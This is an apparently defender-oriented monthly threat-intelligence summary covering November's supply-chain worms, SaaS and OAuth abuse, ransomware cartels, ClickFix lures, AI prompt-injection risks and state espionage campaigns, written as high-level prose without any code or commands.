MONTHLY WRAP MONTHLY WRAP

Overview

November saw a significant increase in attacks involving ecosystem-level compromise, SaaS and support-platform targeting, and rapid experimentation with AI-enabled tradecraft. Supply chain attacks escalated from isolated package backdoors to full ecosystem disruption in npm, PyPI, and NuGet, while China- and DPRK-aligned operators weaponized software updates, recruitment platforms, and router implants for durable espionage access. Ransomware and extortion crews continued to consolidate into cartel formations, with Scattered LAPSUS$ Hunters and The Gentlemen investing in full RaaS stacks and cross-platform payloads. At the same time, defenders confronted a rapidly maturing threat surface around AI browsers, agentic Windows features, and multi-agent ecosystems, where prompt injection, metadata abuse, and side channels now create material risk even in the absence of classic exploits.

  • Supply-chain and developer-ecosystem compromise at scale: Shai-Hulud’s self-spreading npm worm, IndonesianFoods registry flooding, time-bombed NuGet packages targeting PLCs, Tsundere’s cross-platform Node.js botnet, and multiple malicious PyPI packages (legacy bootstrap scripts, “spellcheckers”) turned developer pipelines into primary intrusion vectors rather than secondary risk.
  • SaaS, support, and identity infrastructure as primary targets: Scattered LAPSUS$ Hunters expanded to Zendesk, ShinyHunters abused Gainsight–Salesforce OAuth integrations, and Eurofiber’s ticketing breach reinforced how customer-support portals, connectors, and case systems deliver privileged access to enterprise data.
  • Cartelization and RaaS industrialization: Scattered LAPSUS$ Hunters (SLH) formalized an extortion collective uniting Scattered Spider, LAPSUS$, and ShinyHunters, while ShinySp1d3r and The Gentlemen rolled out mature RaaS platforms with anti-forensics, ETW suppression, and cross-platform encryptors, positioning newer brands alongside entrenched ransomware ecosystems.
  • AI and AI-agents first attack surface expansion: HashJack prompt injection in AI browsers, Microsoft’s agent workspace for Windows, agent session smuggling in multi-agent systems, prompt injection in GitLab Duo, SSRF in ChatGPT Custom GPT Actions, and SSRF in Kibana’s AI Assistant demonstrated that AI integrations now act as first-class attack paths for data exfiltration and covert control.
  • Abuse of mainstream cloud and update infrastructure: PlushDaemon’s EdgeStepper router implant for update hijacking, Update Health Tools’ Azure blob hijack path, SesameOp’s OpenAI-based C2, Cloudflare’s global outage impact, and legacy bootstrap domains in Python packaging highlighted how configuration drift, abandoned domains, and cloud dependencies can deliver effects comparable to direct compromise.
  • ClickFix-style social engineering as a common denominator: Multiple campaigns (ClickFix steganographic loaders, EVALUSION with Amatera and NetSupport RAT, DPRK Contagious Interview fake platforms, new RomCom delivery through SocGholish FAKEUPDATE) used “copy and run this command” flows to turn users into the execution mechanism for in-memory loaders and multi-stage stealers across Windows and macOS.
  • Malware and loaders focused on evasive execution chains: ShadowV2, TamperedChef, Python-based loaders, RONINGLOADER, MastaStealer, and advanced ClickFix variants all relied on steganography, staged archives, heavy obfuscation, and process injection into trusted binaries to bypass signature-driven controls and increase dwell time.
  • Targeted cyber-espionage against government, research, and dissident communities: APT24’s BadAudio, PlushDaemon, Dragon Breath’s RONINGLOADER, SpearSpecter, Ferocious Kitten, Operation SkyCloak, APT-C-60’s SpyGlace, and SmudgedSerpent all pursued sustained access to policy experts, defense sectors, regional governments, and activists through bespoke lures and refined toolchains.
  • Emergent mobile and NFC-enabled fraud ecosystems: Sturnus, Fantasy Hub, BankBot-YNRK, DeliveryRAT, NGate NFC relay, and Android MaaS offerings for banking and spyware operations continued to expand access to real-time communications, financial apps, and ATM interactions.
  • Edge and appliance exploitation as a recurring entry point: FortiWeb CVE-2025-64446, CWP CVE-2025-48703, Orphaned Update Health Tools, and ongoing “Top CVEs of the Week” coverage reinforced that exposed management planes and security appliances remain high-priority targets for both broad exploitation and targeted intrusion.

Threat Landscape Overview 

The operational pattern across November shows adversaries gravitating toward low-friction, high-leverage control planes: developer registries, SaaS connectors, customer-support platforms, and AI-integrated services. Supply chain operations moved beyond isolated malicious packages toward ecosystem-scale disruption in npm, NuGet, and PyPI, with Shai-Hulud’s worm, IndonesianFoods’ registry flooding, and NuGet time bombs all aimed at long-term sabotage and credential theft across development environments and industrial systems. In parallel, China- and DPRK-linked operators focused on scalable access through update hijacking (PlushDaemon’s EdgeStepper), trojanized installers (TamperedChef, Dragon Breath’s NSIS chains), and recruitment-themed delivery for macOS and Windows (FlexibleFerret, DPRK Contagious Interview platform, APT-C-60). These operations paired stealthy loaders, DLL sideloading, and router implants with disciplined C2 and filtering to preserve high-value access.

At the strategic level, ransomware and extortion ecosystems continued to mature, converging toward cartel structures that blend technical sophistication with harassment, brand management, and public narrative control. Scattered LAPSUS$ Hunters and the emerging ShinySp1d3r RaaS embody this shift, borrowing from LockBit and other large programs while testing custom stacks and SLH-branded operations. Campaigns from The Gentlemen, Kraken, Cephalus, and Nevada’s statewide incident illustrate ongoing pressure on virtual infrastructure, RDP exposure, and backup resilience. Simultaneously, AI-adjacent risks moved from theoretical concern to practical exploitation, through AI browser prompt injection, SSRF chains in AI-driven features, and multi-agent session hijacking. Whisper Leak’s traffic-analysis toolkit underscored that even encrypted chatbot interactions can leak topic information. Mitigation work by Microsoft and OpenAI underscores that defenders now have to manage risk in both model content and the surrounding metadata exhaust. As a result, confidence in platforms, connectors, and AI agents is becoming more fragile, pushing security teams to double down on provenance controls, behavioral monitoring, and tightly governed automation and third-party access.

Industries Targeted

  • Cloud, SaaS & DevOps: Shai-Hulud npm worm, IndonesianFoods registry flooding, malicious npm cloaking by dino_reborn, Tsundere botnet using Node.js and Ethereum-based C2, PyPI and NuGet backdoors, GitLab Duo prompt injection, Kibana SSRF, CWP command execution, and exploitation of legacy bootstrap scripts and abandoned domains in Python packaging.
  • Finance, Fintech & Crypto: Sturnus Android banking trojan, Fantasy Hub MaaS targeting Russian banks, BankBot-YNRK and DeliveryRAT financial stealers, NGate NFC relay ATM fraud, spyware campaigns harvesting wallet data on macOS (Nova Stealer), and DPRK recruitment operations targeting AI and crypto firms.
  • Government & Defense: APT24 BadAudio supply-chain espionage, PlushDaemon update hijacking, Operation SkyCloak against Russian and Belarusian military units, SpearSpecter operations against senior officials, Ferocious Kitten surveillance of dissidents, Nevada’s statewide ransomware incident, and the CBO breach affecting U.S. fiscal analysis.
  • Manufacturing, Industrial & Critical Infrastructure: PlushDaemon’s SlowStepper backdoor against manufacturers and ICS-adjacent environments, Sharp7Extend NuGet time bombs against Siemens PLCs, Tsundere’s Node-based botnet across industrial endpoints, and Kraken/Cephalus targeting virtualized infrastructure that often underpins OT management.
  • Telecommunications, Hosting & Internet Infrastructure: Cloudflare global outage and subsequent analysis, CWP exploitation, EdgeStepper router implants, Operation SkyCloak’s Tor-based SSH backdoors, and Update Health Tools’ Azure storage hijack demonstrating how infrastructure and routing layers can cascade into broad disruption.

Most Active Threat Actors

  • ClickFix-adjacent Stealer Ecosystem (ACR / Amatera, Lumma, Rhadamanthys): Large-scale malvertising and fake update operations using memory-only PowerShell and .NET loaders, steganographic payloads, and dual-use infostealers with RAT follow-on access.
  • DPRK Clusters (FlexibleFerret / Contagious Interview variants): macOS-focused recruitment lures, full fake job platforms targeting AI and crypto talent, multi-stage loaders, Golang backdoors, and credential theft through decoy applications and clipboard hijack chains.
  • Dragon Breath / Miuuti Group (APT-Q-27): RONINGLOADER campaigns using trojanized installers, steganographic payloads, and Gh0st RAT deployment with extensive EDR evasion and security-tool tampering across East Asian user bases.
  • Iran-aligned Clusters (SpearSpecter / Ferocious Kitten / SmudgedSerpent): Multi-week WhatsApp rapport-building with TAMECAT PowerShell backdoors, MarkiRAT surveillance of dissidents, and SmudgedSerpent phishing against U.S. policy experts using RMM for persistent espionage access.
  • PlushDaemon & APT24 (PRC-aligned): Long-running espionage clusters using EdgeStepper router implants, JavaScript supply-chain attacks, BadAudio loaders, Cobalt Strike payloads, and update channel hijacking against governments, universities, and regional organizations.
  • Scattered LAPSUS$ Hunters / ShinyHunters / Scattered Spider (The Com): Unified extortion collective pivoting between Snowflake and SaaS intrusions, Gainsight–Salesforce OAuth abuse, Zendesk phishing, and early-stage ShinySp1d3r RaaS development.
  • SesameOp and AI-abuse operators: Threat actors repurposing OpenAI APIs for resilient C2, experimenting with PROMPTFLUX AI-regenerated malware, abusing GitLab Duo and ChatGPT Actions for prompt injection and SSRF, and probing AI browsers for URL-fragment prompt injection and data exfiltration opportunities.Shai-Hulud & IndonesianFoods Operators (Supply-chain): Npm worm and registry-flooding campaigns that weaponize package installation and dependency chains for credential theft, GitHub compromise, and ecosystem disruption.
  • The Gentlemen & Kraken (Ransomware): Rapidly maturing big-game hunters with cross-platform payloads, benchmark-based encryption optimization, affiliate recruitment, and aggressive anti-forensics in Windows, Linux, and ESXi environments.
  • Tsundere, ShadowV2, and related botnet operators: Node.js-based cross-platform botnets using blockchain-backed C2, Mirai-derived IoT exploitation, and stress-testing during global outages to refine DDoS and proxy capabilities against a wide geographic and industry spread.

Hunter Insights

Adversaries are likely to intensify attacks on ecosystems and control planes rather than individual endpoints, focusing on developer registries, SaaS connectors, AI-integrated services, and edge appliances as efficient paths to both mass compromise and high-value data theft. Over the coming months, defenders should expect supply-chain infections in npm, PyPI, and NuGet, abuse of customer-support and identity platforms, and AI-agent prompt injection to converge into blended campaigns that chain together software updates, OAuth connectors, and AI workflows for stealthy access and long-lived persistence.

Ransomware and extortion operations will likely continue consolidating into cartel-like structures, with groups such as Scattered LAPSUS$ Hunters, ShinySp1d3r, The Gentlemen, and Kraken investing in mature RaaS stacks, cross-platform encryptors, and harassment-heavy extortion tactics targeting backups, virtual infrastructure, and executive-facing applications. At the same time, state-aligned and financially motivated actors are expected to expand espionage and fraud operations across routers, mobile devices, and NFC channels, using steganographic loaders, social-engineering “click-to-run” flows, and OpenAI-backed C2 to bypass traditional detection and exploit lingering exposure in government, cloud, financial, and industrial environments.

💡
Hunter Strategy encourages our readers to look for updates in our daily Trending Topics and on Twitter.